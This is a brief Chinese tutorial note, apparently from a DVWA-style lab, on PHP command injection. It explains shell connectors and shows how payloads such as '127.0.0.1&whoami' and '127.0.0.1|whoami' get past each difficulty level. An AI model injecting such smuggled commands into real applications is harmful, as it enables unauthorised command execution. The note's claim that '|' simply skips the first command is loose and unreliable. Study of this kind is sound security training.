命令注入解释:
命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内;PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一;
连接符: && & |
1、command1 && command2
第一个命令执行成功后才会执行第二个命令,否则不执行;
2、command1 & command2
不管前面的命令是否执行成功,后面的命令都会执行;
3、command1 | command2
跳过前面的命令,执行后面的命令;
一、low级别
执行命令127.0.0.1
执行命令
127.0.0.1&whoami
二、medium级别
执行命令
127.0.0.1&whoami
三、high级别
1、执行命令
127.0.0.1&whoami
失败
2、执行命令
127.0.0.1|whoami